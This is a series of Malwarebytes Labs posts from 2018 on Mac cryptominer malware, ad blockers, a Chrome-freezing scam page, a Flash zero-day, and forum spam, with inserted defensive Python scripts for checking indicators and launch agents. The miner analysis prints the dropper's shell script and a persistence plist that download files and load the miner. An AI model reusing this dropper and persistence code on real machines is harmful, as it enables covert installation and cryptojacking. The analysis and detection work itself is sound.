This is a pretty specific name, but it remains to be seen whether this is his real name or if it’s a decoy. Since this malware is not terribly sophisticated, with some pretty dumb mistakes being made with it, my suspicion is that the hacker who created it had no idea that the .DS_Store file existed, much less that it would capture the username he was using on his computer.

Hopefully, the authorities can track down Mr. Mateus and suss out any involvement he may have had in the creation of this malware.

IOCs

Dropped files

~/Library/LaunchAgents/
~/Library/LaunchAgents/GoogleSoftwareUpdateAgent.plist
~/Library/LaunchAgents/MacOS.plist
~/Library/LaunchAgents/MacOSupdate.plist
~/Library/Apple/Dock
~/Library/mdworker/mdworker

Hashes

3ec55908c3357b92a58f877440d110a970d4ce4cc76a8ac1a7281abec71c717f
d58dd1f057da70a28a67ef48fe4c3942f99ffa082dd7d79c139db7f86e8ac63c
b30ef172e01a31c687e311334677241c2b338844a6bc92bfe06bb5f359281dfa
47667ab1c5950b77ed50a7e629dd916db7505bcb9abff6e21dd7edaa280cc043
6b8d88f08569c4ff778647bede9dbb329dad628474422f86cec2ba0c3084072a
a6f454b71a4d4f1c9767197f5459363f77fb205ef274a189e4e0aefa825b19f9
ac8f29c762e27d5c6ccb73c016cd05f79123bcf5420e9f7547839243c39d6a4c
dd3731d421901f17f213ffd0a38596e12f413d43100be9754879247f51c75397
f23ec1d8de76824838b2ac2782ac97819f94c3a5695e2be83357f5a6e0d12d8c
2527ff0b11fd312c7aa7fc39f19c08298f2a0e17c171f96f83e8a32c4979c878
3dc8fdfb09f38f6ca1ae0360660a9b71e3be58b1ea72655fa07fcc0ed8633e29
eff259d20b01d96b6ae9c05106e6462f5e0dd8ae6dc548f5b9d87444b45988d0
cfa7a04e4958acf89baa0dd2ce2a8b9618fd500f7ed6fffd4cf7703c9bbde188
28219506e683f4324815bcfb4fb9115abfdc611ad49f00d1382ff005f8b10103
cc058cc8821ed92e0c8385a36b4aae589e7383a05eba764195f311c046a519fd
592ba3b270c5f46c2912e64d855f2ff918af4b9708845b5239b83e949d670ba9
a1cdbd2a03bb84f001034ecaed52e45147213e487b2b83df94da42893a2b725f
783ffb8b21e8df463c8f024d4e085aae345ee5784db62c7209f07f30a0fda399
e59c8db1a48b08d03e0c64b9259c11154e267662d5d1183b8dc6837afc33006a
17ff20345c9579ee1f5f51cb5c36806e238536b18db112a99a15b9e0ff190acf
1fc064e7d6624d1539469dc038709fffb7aabc6b484446d7d9dd87507680155f
83f40501e7f27b2b3aa0590b63985b9af99e05dd71f333b2b2d430bd9b4335df
f75b21f758b698822518eee358c8b57e9f5421d691d5a9d6fbe395a974c57c3e
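The IOC list is usable as-is for a quick host check. The following added example (not the post’s or Malwarebytes’ own tooling) walks a home directory the way an analyst would: it looks for the dropped executables at the listed paths, hashes them against the published SHA-256 list, and reads every user launch agent to see whether its file name or the program it runs matches the IOCs. It builds a constructed sample home directory with a stand-in `Dock` file and a `MacOS.plist` agent, which is not real malware; only three of the hashes are embedded to keep the block short, and the benign agent and its `/usr/bin/true` program are assumptions for contrast.

```python
import hashlib
import plistlib
import tempfile
from pathlib import Path

# Three of the SHA-256 hashes from the IOC list above; load the full list in practice.
KNOWN_HASHES = {
    "3ec55908c3357b92a58f877440d110a970d4ce4cc76a8ac1a7281abec71c717f",
    "d58dd1f057da70a28a67ef48fe4c3942f99ffa082dd7d79c139db7f86e8ac63c",
    "b30ef172e01a31c687e311334677241c2b338844a6bc92bfe06bb5f359281dfa",
}
# Launch agent names and dropped executables from the IOC list, relative to $HOME.
IOC_AGENT_NAMES = {"GoogleSoftwareUpdateAgent.plist", "MacOS.plist", "MacOSupdate.plist"}
IOC_PROGRAMS = ("Library/Apple/Dock", "Library/mdworker/mdworker")


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def agent_program(plist_path):
    """Return the executable a launchd agent runs: ProgramArguments[0], else Program."""
    with open(plist_path, "rb") as fh:
        data = plistlib.load(fh)
    args = data.get("ProgramArguments") or []
    return args[0] if args else data.get("Program")


def triage_home(home, known_hashes=KNOWN_HASHES):
    """Check one user's home directory against the IOCs; returns a list of findings."""
    home = Path(home)
    findings = []

    def record(path, reason):
        for entry in findings:
            if entry["file"] == str(path):
                entry["reasons"].append(reason)
                return
        findings.append({"file": str(path), "sha256": sha256_file(path), "reasons": [reason]})

    # 1. Dropped executables at the listed locations, matched by path and by hash.
    for rel in IOC_PROGRAMS:
        candidate = home / rel
        if candidate.is_file():
            record(candidate, "ioc-dropped-path")
            if sha256_file(candidate) in known_hashes:
                record(candidate, "ioc-hash")

    # 2. Persistence: every user launch agent, checked by file name and by what it runs.
    agents = home / "Library" / "LaunchAgents"
    for plist in sorted(agents.glob("*.plist")) if agents.is_dir() else []:
        if plist.name in IOC_AGENT_NAMES:
            record(plist, "ioc-agent-name")
        try:
            program = agent_program(plist)
        except Exception:  # a launch agent launchd cannot parse deserves a look too
            record(plist, "unparseable-plist")
            continue
        if program and program.replace("~", str(home), 1).endswith(IOC_PROGRAMS):
            record(plist, "ioc-program-path")
    return findings


def build_sample_home():
    """Constructed sample home directory laid out like the IOC list (not real malware)."""
    home = Path(tempfile.mkdtemp(prefix="ioc-demo-"))
    dock = home / "Library" / "Apple" / "Dock"
    dock.parent.mkdir(parents=True)
    dock.write_bytes(b"#!/bin/sh\necho 'stand-in for the miner binary'\n")
    agents = home / "Library" / "LaunchAgents"
    agents.mkdir()
    with open(agents / "MacOS.plist", "wb") as fh:
        plistlib.dump({"Label": "MacOS", "ProgramArguments": [str(dock)], "RunAtLoad": True}, fh)
    with open(agents / "com.example.benign.plist", "wb") as fh:
        plistlib.dump({"Label": "com.example.benign", "Program": "/usr/bin/true"}, fh)
    return home


if __name__ == "__main__":
    for finding in triage_home(build_sample_home()):
        print(finding["file"], finding["reasons"])
```

The path and agent-name checks fire on the sample even though its stand-in binary does not hash-match, which is the point of carrying both kinds of indicator: a recompiled variant changes the hash but rarely the persistence layout.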

The post New Mac cryptominer has 23 older variants appeared first on Malwarebytes Labs.


Safer Internet Day 2018: ad blockers and anti-trackers

Malwarebytes - Tue, 02/06/2018 - 18:00

The path to a safer Internet can be a bit of a quandary. What programs should you buy? How long should your passwords be?  Is it okay to write them down? What makes a website secure?

All of these questions can merit their own lengthy essays, so today, on Safer Internet Day, we’re going to look at some of the simplest solutions for security. What is the easiest, fastest, completely free thing you can do to have a safer Internet experience? The answer: ad blockers and anti-tracking browser extensions. Let’s take a look at how.

Ad blockers

Some people feel that ad blockers are unethical, as they deprive others in the content chain of income. While this can be debated, it’s indisputable that cybercriminals love using ads as a malware delivery mechanism.

Traditionally, bad ads have delivered exploit kits, forced redirects, fake plugin updates, and more.  Recently, malicious ads have been caught running cryptominers, monopolizing your CPU to make the owners a few pennies. Given that you can’t be infected by an ad that doesn’t load, you might want to check out one of the following ad blockers.

uBlock Origin (Chrome, Firefox, Safari, Edge)

Is simply blocking most ads not good enough for you? Does the idea of “acceptable ads” seem like a contradiction? uBlock Origin might be for you. Most ad blockers are designed for the casual user, eschewing features in favor of keeping a low barrier to entry. uBlock Origin is built around giving maximum power to the user to determine what content they wish to see, with block granularity down to individual ads on a single site. It used to lose points for being a little tough to get going, but the interface has since improved, giving a simplified dashboard of the nastiness being blocked, as well as a much more detailed view if you’re so inclined.

Adblock (Chrome, Firefox, Safari, Edge, Android)

Adblock is one of the earlier blockers out there, and is relatively easy to set and forget. Depending on your block list subscriptions, it may not banish 100 percent of ads from your view, and occasionally struggles with YouTube pre-roll ads.

While its baseline functionality is perfectly serviceable, many privacy advocates take issue with Adblock’s policy on “acceptable ads.” Basically, if your ad meets certain criteria making it less annoying than most, Adblock will let it through. This is something that can be switched off if you’d prefer, but blocking advocates tend to be irritated by the need to go menu diving for what they view as a core function of any blocker—blocking ads.

1Blocker (iOS)

Mobile ads, even when not malicious, are some of the worst out there. We’ve observed tech support scams, forced redirects to PUP downloads, and lock screens on the rise for all mobile platforms. 1Blocker’s free version will give you back control of what code runs on your iPhone, and in some instances will reduce the load on your battery as well.

Anti-trackers

When you visit a website, part of its content will be delivered by domains separate from the one you actually clicked on. Some of these domains have trackers that send information about your browsing habits to third parties, often for the purpose of serving up ads. Not only can it feel like a violation of privacy, but it can also result in longer load times and wasted bandwidth.

This is a little harder to understand in terms of safety. Aren’t all those people up in arms over privacy concerns being a little paranoid? The threat here is not that Google AdWords is going to take your aggregated data and use it to come club you over the head. A more realistic threat is that AdWords and other poorly vetted (that is to say—all of them) ad networks are accumulating data at a scale that is impossible to moderate, police, or secure.

Given that third parties have had a pretty awful track record at protecting customer data stores at scale, perhaps we should let them have less of it. Anti-tracking browser extensions like Ghostery and the EFF’s Privacy Badger are easy to install, and give you back some measure of control over who is holding onto data about your Internet use.

How do these services keep me safe?

At its core, safety is not a product or service; safety is a collection of behaviors.  While we referred to a handful of products above, they’re really just tools in furtherance of an important behavior—keeping control of what data goes out, and what code goes into your system.

Keeping a vigilant eye on both processes can go a long way towards staying safe online without spending a lot of money. To learn a little more about common online threats, check out our post on bad ads here, and our post on avoiding scams here.

Stay safe, everyone!

The post Safer Internet Day 2018: ad blockers and anti-trackers appeared first on Malwarebytes Labs.


Tech support scammers find new way to jam Google Chrome

Malwarebytes - Tue, 02/06/2018 - 16:21

During the past quarter, we have noted an increase in fake browser alerts pushing tech support scams. Most of these campaigns come from malicious advertising, but some also arrive via compromised websites. Crooks are using all sorts of tricks not only to scare users but also to try to ‘lock’ their browsers.

One such technique, involving the history.pushState API, which we reported on this blog, has since been patched but continues to be used. There are also the infamous pop-unders, which can be used in such a way that users are stuck between various tabs.

In yet another twist, scammers are now abusing another API that achieves their intended goal of freezing the browser. By doing so they hope that users will panic and call the toll-free number for assistance. The following animation shows what a user may experience with Google Chrome’s latest version (64.0.3282.140).

The code responsible for this is embedded within the main page, and slightly obfuscated:

The Blob constructor coupled with the window.navigator.msSaveOrOpenBlob method lets you save files locally and, as you may have guessed, is what is being abused here.

The ch_jam() function calls another function called bomb_ch(); both are appropriately named for what they do. bomb_ch() in turn calls the download function that uses the aforementioned Blob constructor.

It happens too fast to see how it works, but you may be able to catch it on a powerful enough machine if you try to close the tab early on. That code triggers a very large number of downloads in rapid fire, which causes the browser to become unresponsive within a few seconds and unable to be closed by normal means.

The primary targets for this particular browser freeze are Google Chrome users on Windows. Other browsers get their own landing pages, abusing other HTML APIs. Given Chrome’s share of the browser market, this is yet another example of threat actors’ eagerness to deploy new social engineering schemes.

Since most of these browser lockers are distributed via malvertising, an effective mitigation method is to use an ad-blocker. As a last resort, the Windows Task Manager will allow you to forcefully quit the offending browser processes. Malwarebytes users were already protected against the redirection mechanism used in this attack.

The post Tech support scammers find new way to jam Google Chrome appeared first on Malwarebytes Labs.


New Flash Player zero-day comes inside Office document

Malwarebytes - Mon, 02/05/2018 - 20:55

A new Flash Player zero-day has been found in recent targeted attacks, as reported by KrCERT. The flaw, which exists in Flash Player and earlier versions, allows an attacker to remotely execute malicious code. On February 1, Adobe published a security advisory acknowledging this zero-day:

Adobe is aware of a report that an exploit for CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users. These attacks leverage Office documents with embedded malicious Flash content distributed via email.

Threat actors used a decoy Microsoft Excel document to lure their intended targets (some South Korean users) in order to infect them with a remote administration tool named ROKRAT. While not obvious at first, an ActiveX object has been embedded into the document and contains the Flash exploit. Highlighting cells reveals a small white rectangle that represents the embedded object:

Upon opening the spreadsheet, one of several South Korean websites will be contacted via a GET request containing the following three parameters:

  • a unique identifier
  • the Flash Player version
  • the Operating System version

This is an important step because it retrieves a key used to decrypt the malicious shell code.

By the time we had access to this sample, the websites hosting it were down, which prevented the exploit chain from completing and delivering its payload in our testing. Malwarebytes detects the remote administration tool that was dropped, as well as blocks the sites known to have hosted the key and payload.

Adobe has said it will issue a patch for this zero-day sometime during the week of February 5. In the meantime, users are advised to disable or uninstall Flash Player. We expect that this exploit will be used in larger-scale attacks, including via malicious spam. We will keep you updated on any further developments.
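Because the exploit rides inside an ordinary-looking Office file, the useful check on the receiving end is whether a document carries an ActiveX part at all, and whether any binary part contains an SWF. The following is an added example, not code from the original post or from KrCERT: it treats an OOXML file as the zip container it is, lists ActiveX and embedded-object parts, looks for the Flash ActiveX class ID in the ActiveX XML, and scans binary parts for the `FWS`/`CWS`/`ZWS` SWF header. The sample workbook is constructed with a fake header rather than a real exploit; the class ID `D27CDB6E-AE6D-11CF-96B8-444553540000` is the Shockwave Flash control’s registered CLSID, and the version/length plausibility bounds are an assumption to cut down on chance matches.

```python
import io
import struct
import zipfile

# SWF file header magics: uncompressed, zlib-compressed, LZMA-compressed.
SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")
# Registered CLSID of the Shockwave Flash ActiveX control.
FLASH_CLSID = "D27CDB6E-AE6D-11CF-96B8-444553540000"


def find_swf_signatures(data):
    """Return (offset, magic, version, length) for every plausible SWF header in data.

    The bounds on the version byte and the declared length are an assumption used
    to ignore chance three-byte matches inside binary parts.
    """
    hits = []
    for magic in SWF_MAGICS:
        start = 0
        while True:
            i = data.find(magic, start)
            if i < 0 or i + 8 > len(data):
                break
            version = data[i + 3]
            length = struct.unpack_from("<I", data, i + 4)[0]
            if 1 <= version <= 50 and 8 <= length <= 256 * 1024 * 1024:
                hits.append((i, magic.decode(), version, length))
            start = i + 1
    return sorted(hits)


def scan_office_document(doc):
    """Inspect an OOXML container (xlsx/docx/pptx) for embedded ActiveX/Flash content.

    `doc` is a path or the file's bytes.
    """
    src = io.BytesIO(doc) if isinstance(doc, (bytes, bytearray)) else doc
    report = {"activex_parts": [], "ole_objects": [], "flash_classid": [], "swf": []}
    with zipfile.ZipFile(src) as z:
        for name in z.namelist():
            lower = name.lower()
            is_activex = "/activex/" in lower
            is_embedding = "/embeddings/" in lower
            if is_activex:
                report["activex_parts"].append(name)
            if is_embedding:
                report["ole_objects"].append(name)
            if is_activex and lower.endswith(".xml"):
                if FLASH_CLSID in z.read(name).decode("utf-8", "replace").upper():
                    report["flash_classid"].append(name)
            if is_activex or is_embedding or lower.endswith((".bin", ".swf")):
                for off, magic, ver, length in find_swf_signatures(z.read(name)):
                    report["swf"].append({"part": name, "offset": off, "magic": magic,
                                          "version": ver, "length": length})
    if report["swf"] or report["flash_classid"]:
        report["verdict"] = "flash-embedded"
    elif report["activex_parts"] or report["ole_objects"]:
        report["verdict"] = "embedded-object-present"
    else:
        report["verdict"] = "clean"
    return report


def build_sample_xlsx(with_flash=True):
    """Constructed sample, not the real exploit document.

    An xlsx-shaped zip; with_flash adds an ActiveX part whose XML names the Flash
    CLSID and whose binary part carries a fake CWS header (a real part would be an
    OLE compound file wrapping the control's data).
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/worksheets/sheet1.xml", "<worksheet/>")
        if with_flash:
            z.writestr("xl/activeX/activeX1.xml",
                       '<ax:ocx ax:classid="{%s}" ax:persistence="persistStreamInit"/>' % FLASH_CLSID)
            fake_swf = b"CWS" + bytes([28]) + struct.pack("<I", 4096) + b"x\x9c" + b"\x00" * 30
            z.writestr("xl/activeX/activeX1.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 60 + fake_swf)
    return buf.getvalue()


if __name__ == "__main__":
    print(scan_office_document(build_sample_xlsx()))
```

A mail gateway rule that quarantines anything with a `flash-embedded` verdict is cheap and, with Flash on its way out, has almost no legitimate traffic to collide with; the `embedded-object-present` verdict is the one that needs a human look.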

Indicators of compromise

[.]kr/design/m/images/image/image.php?[.]kr

SWF exploit


The post New Flash Player zero-day comes inside Office document appeared first on Malwarebytes Labs.


A week in security (January 29 – February 04)

Malwarebytes - Mon, 02/05/2018 - 18:45

Last week on Labs, we looked into PUPs stealing and using mainstream logos of security and tech companies to further gain user trust, GandCrab and Scarab ransomware variants in the wild, and a new Mac malware called OSX.CreativeUpdate that was distributed via MacUpdate. We also profiled robocalling and ransomware, particularly how ransomware was named the “It” malware of early- to mid-2017 and then began to fizzle like a dying firecracker from the end of the year onwards.

Stay safe, everyone!

The post A week in security (January 29 – February 04) appeared first on Malwarebytes Labs.


Boomerang spam bombs Malwarebytes forum—not a smart move

Malwarebytes - Mon, 02/05/2018 - 17:57

Tech support scammers are generally not the best and brightest. As such, they will occasionally post ads for their fake companies in the comment sections here or on the Malwarebytes forums. Last week, however, scammers struggled with configuring their spambots, resulting in spam bombs on the forum lasting roughly 72 hours, with a slow taper down for two more days.

Over six days, 246 spam accounts associated with this activity were banned. We wondered what threat actor group would exercise such phenomenally poor judgment, so we drilled down a bit into who these people are.

As it turns out, the majority of the spam was posted for a threat actor we were already familiar with: Boomerang Tech Solutions. Boomerang runs scams with an antivirus theme, so they use the Malwarebytes brand to appear properly comprehensive to victims. They also look to legitimate AV customers for scam targets. Over the past year, Boomerang has:

  • Posted ads to our forums
  • Posted ads to blog comment sections
  • Maintained Twitter accounts to direct traffic to their domains
  • Monitored the Facebook pages of various AV companies to find customers requesting tech support. They then targeted those customers with linked phone numbers, claiming to be the company in question.
  • Made outbound calls to victims as Malwarebytes, then subsequently deleted MBAM from victim systems

As you can imagine, this behavior has not endeared them to US-based merchant processors, leaving them with pay by check as the primary payment option. (More on why alternative payment options tend to be bad here.)


Our counterfraud team has observed the following Indicators of Compromise (IOCs) related to Boomerang activity:

Website                            Twitter handle
Antivirus-support-number[.]com     @Malwrebytes
Boomerangtechnologies[.]info       @malwarebytes4
www.antivirustechnicalhelp[.]com   @malwarebytes_
www.wisdomsquad[.]com              @malwarebytetech
www.seccurityexperts[.]com         @quickencontact2
liveantivirushelp[.]com            n/a
antivirusconsulting[.]com          n/a


How Boomerang rips us off

When Boomerang first came on our radar about a year ago, we called them up to see precisely how victims are being targeted. As you can see in the video of our call below, there’s nothing at all original here. Boomerang tells us that we are bedeviled by “illegal connections” sending our data overseas. The only slightly unusual parts are the relatively high quality of their website (most of these guys struggle with HTML), and the phone rep who told us that Malwarebytes does not protect from “viruses coming from the Internet.” Check out the video to see the standard Boomerang pitch.

How to stay safe

First and foremost, be a little extra suspicious of any company that is reluctant to accept payment by credit card. If they can’t process credit card payments easily, there’s probably a good (bad) reason why. If you’ve had a run-in with these or any other tech support scammers (on our site, forum, or anywhere else), you can find information on what to do next here.

Have you been contacted by someone claiming to be us or our representative? See how to evaluate those claims here. Lastly, if you’ve dealt with anyone from Boomerang yourself, post to the comments below to let others know your experience. Stay suspicious and stay safe.

The post Boomerang spam bombs Malwarebytes forum—not a smart move appeared first on Malwarebytes Labs.


New Mac cryptominer distributed via a MacUpdate hack

Malwarebytes - Fri, 02/02/2018 - 21:20

Early this morning, security researcher Arnaud Abbati of SentinelOne tweeted about new Mac malware being distributed via MacUpdate. This malware, which Abbati has named OSX.CreativeUpdate, is a new cryptocurrency miner, designed to sit in the background and use your computer’s CPU to mine the Monero currency.

The malware was spread via a hack of the MacUpdate site, which was distributing maliciously modified copies of the Firefox, OnyX, and Deeper applications. According to a statement posted in the comments for each of the affected apps on the MacUpdate website, this happened sometime on February 1.

Both OnyX and Deeper are products made by Titanium Software, but the site was changed maliciously to point to download URLs on a different domain, one first registered on January 23 and whose ownership is obscured. The fake Firefox app was distributed from a look-alike domain. (The domain ends in a string that resembles the legitimate vendor's name, but it is definitely not the same domain. This is a common scammer trick to make you think it's coming from a legitimate site.)

The downloaded files are .dmg (disk image) files, and they look pretty convincing. In each case, the user is asked to drag the app into the Applications folder, as would the original, non-malicious .dmg files for those apps.

The applications themselves were, as Abbati indicated in his tweet, created by Platypus, a developer tool that makes full macOS applications from a variety of scripts, such as shell or Python scripts. This means the creation of these applications had a low bar for entry.

Once the application has been installed, when the user opens it, it will download and install the payload from a legitimate site owned by Adobe. Then, it attempts to open a copy of the original app (referred to as a decoy app, because it is used to trick the user into thinking nothing’s wrong), which is included inside the malicious app.

However, this isn’t always successful. For example, the malicious OnyX app will run on Mac OS X 10.7 and up, but the decoy OnyX app requires macOS 10.13. This means that on any system between 10.7 and 10.12, the malware will run, but the decoy app won’t open to cover up the fact that something malicious is going on. In the case of the Deeper app, the hackers got even sloppier, including an OnyX app instead of a Deeper app as the decoy by mistake, making it fail similarly but for a more laughable reason.

The “script” file inside the app takes care of opening the decoy app, and then downloading and installing the malware.

# open the decoy app bundled inside the malicious app
open
if [ -f ~/Library/mdworker/mdworker ]; then
    # already installed: just stop the dropper process
    killall Deeperd
else
    # first run: fetch the archive, unpack it into ~/Library, install and load the launch agent, then clean up
    nohup curl -o ~/Library/ content_disposition=attachment \
      && unzip -o ~/Library/ -d ~/Library \
      && mkdir -p ~/Library/LaunchAgents \
      && mv ~/Library/mdworker/MacOSupdate.plist ~/Library/LaunchAgents \
      && sleep 300 \
      && launchctl load -w ~/Library/LaunchAgents/MacOSupdate.plist \
      && rm -rf ~/Library/ \
      && killall Deeperd &
fi

For those who can’t read shell scripts, this code first attempts to open the decoy, which will fail since the wrong decoy was included by mistake. Next, if the malware is already installed, the malicious dropper process is killed, since installation is not necessary.

If the malware is not installed, it will download the malware and unzip it into the user’s Library folder, which is hidden in macOS by default, so most users wouldn’t even know anything had been added there. It also installs a malicious launch agent file named MacOSupdate.plist, which recurrently runs another script.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>MacOSupdate</string>
    <key>ProgramArguments</key>
    <array>
        <string>sh</string>
        <string>-c</string>
        <string>launchctl unload -w ~/Library/LaunchAgents/MacOS.plist && rm -rf ~/Library/LaunchAgents/MacOS.plist && curl -o ~/Library/LaunchAgents/MacOS.plist content_disposition=attachment && launchctl load -w ~/Library/LaunchAgents/MacOS.plist && ~/Library/mdworker/mdworker</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>

When this launch agent runs, it downloads a new MacOS.plist file and installs it. Before doing so, it will remove the previous MacOS.plist file, presumably so it can be updated with new code. The version of this MacOS.plist file that we obtained did the real work.
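A defender-side triage check for the persistence described above, added here as an example; it is not code from the Malwarebytes post. It parses launch agent plists with Python's standard plistlib and flags the traits the post's MacOSupdate.plist shows: a `sh -c` wrapper, a curl download, launchctl reloading the agent's own plist, and a binary under ~/Library named after a system process (mdworker). The two sample plists, the placeholder URL and the benign backup-tool agent are constructed for this example.

```python
import plistlib
import re

# Process names the post's agent borrowed; the real mdworker lives in /System.
IMITATED_SYSTEM_NAMES = {"mdworker", "sysmdworker"}
SHELLS = {"sh", "/bin/sh", "bash", "/bin/bash", "zsh", "/bin/zsh"}


def suspicious_traits(plist_bytes):
    """Return sorted trait labels found in one LaunchAgent plist (bytes)."""
    agent = plistlib.loads(plist_bytes)
    args = [str(a) for a in agent.get("ProgramArguments", [])]
    if not args and "Program" in agent:
        args = [str(agent["Program"])]
    # A `sh -c "<commands>"` wrapper hides the real logic in one string.
    wrapped = args[2] if len(args) >= 3 and args[0] in SHELLS and args[1] == "-c" else None
    cmd = wrapped if wrapped is not None else " ".join(args)
    traits = set()
    if wrapped is not None:
        traits.add("shell-wrapper")
    if re.search(r"\bcurl\b[^&|;]*\s-o\s", cmd):
        traits.add("downloads-file")           # fetches content on every run
    if re.search(r"\blaunchctl\s+(?:load|unload)\b", cmd):
        traits.add("reloads-launchagent")
    if "downloads-file" in traits and re.search(r"\bcurl\b[^&|;]*LaunchAgents/\S+\.plist", cmd):
        traits.add("replaces-own-plist")       # the self-update trick in the post
    for name in re.findall(r"~/Library/(?:[^\s/]+/)*([^\s/]+)", cmd):
        if name.split(".")[0] in IMITATED_SYSTEM_NAMES:
            traits.add("system-name-in-user-library")
            break
    return sorted(traits)


def triage(plists_by_path, threshold=2):
    """Map each plist path to its traits; `threshold` or more traits flags it."""
    report = {}
    for path, data in plists_by_path.items():
        traits = suspicious_traits(data)
        report[path] = {"traits": traits, "flagged": len(traits) >= threshold}
    return report


# Constructed samples: the first mirrors the post's MacOSupdate.plist (placeholder URL), the second is benign.
SAMPLE_PLISTS = {
    "~/Library/LaunchAgents/MacOSupdate.plist": plistlib.dumps({
        "Label": "MacOSupdate", "RunAtLoad": True,
        "ProgramArguments": ["sh", "-c",
            "launchctl unload -w ~/Library/LaunchAgents/MacOS.plist && "
            "rm -rf ~/Library/LaunchAgents/MacOS.plist && "
            "curl -o ~/Library/LaunchAgents/MacOS.plist https://placeholder.invalid/x && "
            "launchctl load -w ~/Library/LaunchAgents/MacOS.plist && "
            "~/Library/mdworker/mdworker"]}),
    "~/Library/LaunchAgents/com.example.backup.plist": plistlib.dumps({
        "Label": "com.example.backup", "RunAtLoad": True,
        "ProgramArguments": ["/usr/local/bin/backup-tool", "--quiet"]}),
}

if __name__ == "__main__":
    for path, result in triage(SAMPLE_PLISTS).items():
        print(path, "FLAGGED" if result["flagged"] else "ok", result["traits"])
```

On a live system the same function can be fed the bytes of every file in ~/Library/LaunchAgents; a single trait (such as RunAtLoad or a plain shell wrapper) is common in legitimate agents, which is why the verdict needs two or more.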

sh -c ~/Library/mdworker/sysmdworker -user -xmr

This loads a malicious sysmdworker process, passing in a couple of arguments, one of which is an email address.

That sysmdworker process will then do the work of mining the Monero cryptocurrency, using a command-line tool called minergate-cli, and periodically connecting to a remote server, passing in the above email address as the login.

There are multiple takeaways from this. First and foremost, never download software from any kind of “download aggregation” site (a site that acts like an unofficial Mac App Store to let you browse for software). Such sites have a long history of issues. In the case of MacUpdate, back in 2015 they were modifying other people’s software, wrapping it in their own adware-laden installer. This is no longer happening, but in 2016, MacUpdate was similarly used to distribute the OSX.Eleanor malware.

Instead, always download software directly from the developer’s site or from the Mac App Store. These are not guarantees, and can still get you infected with malware, adware, or scam software. But your odds are better. Be sure to check around to make sure the software is legitimate before downloading, but do not give full credence to ratings or reviews on third-party sites or the Mac App Store, as those can be faked.

Second, if you have downloaded a new application and it seems not to be functioning as expected—such as not opening at all when you double-click it—be suspicious. Consider scanning your computer with security software. Malwarebytes for Mac will detect this malware as OSX.CreativeUpdater.

Finally, be aware that the old adage that “Macs don’t get viruses,” which has never been true, is proven to be increasingly false. This is the third piece of Mac malware so far this year, following OSX.MaMi and OSX.CrossRAT. That doesn’t even consider the wide variety of adware and junk software out there. Do not let yourself believe that Macs don’t get infected, as that will make you more vulnerable.

The post New Mac cryptominer distributed via a MacUpdate hack appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Ransomware’s difficult second album

Malwarebytes - Fri, 02/02/2018 - 15:00

The last year has seen all manner of cybercrime, from scams and social engineering to malvertising and malspam. What’s interesting is that so many “next-gen,” sophisticated malware mainstays like exploits have dropped in popularity, while other more traditional types such as spyware have shot up dramatically—to the tune of an 882 percent increase in UK detections.

Meanwhile, here’s ransomware pretty much falling off a cliff, dropping as low as a 10 percent infection rate in December 2017:


Why is everyone jumping on the “I used spyware perfectly fine in 2007, and now I will again” bandwagon? Why is ransomware stagnating and tailing off? What omnipresent entity is dancing away behind the scenes, tying connections together and ensuring today’s attack news is yesterday’s old newspapers?

One of the answers, for me anyway, is Bitcoin.

(Digital) money makes the world go round

For many people in security circles (both victims and researchers), the first time coming across any mention of Bitcoin was through the payment demanded by ransomware authors. I have far too many memories of victims asking me what on Earth a Bitcoin was as they stared at the ransom screen blinking out from their computers. Bitcoin quickly became the payment method of choice over and above the formerly more common “send us an iTunes card code or wire us some money” demands.

From there, the professional criminal community fully embraced Bitcoin as the payment method of choice. They started utilizing Tor onion links to further anonymize the transaction, and layered on lots of other tactics that frankly required scammers to include FAQs in multiple languages just to ensure victims knew what they had to do next.


Once the script kiddies and amateur hour developers saw the big players raking in Bitcoin cash, they decided they wanted some of the same. We then had lots of pieces of poorly designed, DIY ransomware. You couldn’t always guarantee files would be decrypted after payment, and often it was impossible to tell if this was done intentionally or by accident. Even some of the big names didn’t always do what they were supposed to do.

The weird thing about ransomware is that it relies on dishonest developers being, well, honest. If people are coughing up lots of money to get their files back and it isn’t happening, word of mouth and a rapid press response will ensure the law of diminishing returns kicks in. People will either get smart and back up their files or simply resign themselves to losing them. A nice little earner suddenly becomes a big pile of nothing. Or, to put it another way:

For those wanting to ply their trade over a long time, this is, of course, not a good result.

The great ransomware fightback of 2017

Alongside bad developers and the increased public visibility that followed some huge outbreaks in 2017, security tools have become better equipped to deal with ransomware threats. In addition, lots of standalone programs have been made by independent researchers to decrypt files. This increased awareness of ransomware prevention (backing up files, using security tools) alongside decreasing prices for file storage has really helped to defang the ransomware menace to some degree. It’s no longer the killer app it once was for scammers, and with a few precautions in place, it loses much of its power.

And then, at last, we come to the Bitcoins themselves. You don’t need me to tell you the price is simultaneously through the roof and in the toilet, on the kind of crazy rollercoaster ride you just can’t predict. Back in the days when they weren’t quite so highly valued, ransomware authors could afford to get away with asking for the odd coin or two. Now? Frankly, they’re taking a huge leap of faith that someone can summon up the cryptocash to get their files back.

There are many pieces of ransomware out there that can be controlled by Command & Control servers; new files can be downloaded as required, and, if needed, criminals can tweak values to more manageable figures. Trouble is, there’s no guarantee our malware-developing friend is sitting there monitoring the rise and fall and rise and rise and fall of Bitcoin. It’s also entirely possible they don’t really care if the coin value on display is a bit too much to pay, because another victim will be along in a minute.

As for the DIY/home-brew contingent? Everything may well be hardcoded into the file, with no way to alter it once it lurches into the wild. At that point, if they’re asking for four Bitcoins and the price triples overnight, there’s a good chance they won’t be getting any money out of it.

There are many other factors at play of course, but “we’re slowly strangling ourselves out of the market by asking for ridiculous amounts of money” is certainly a rather large warning sign.

Swings, roundabouts, and the path of least resistance

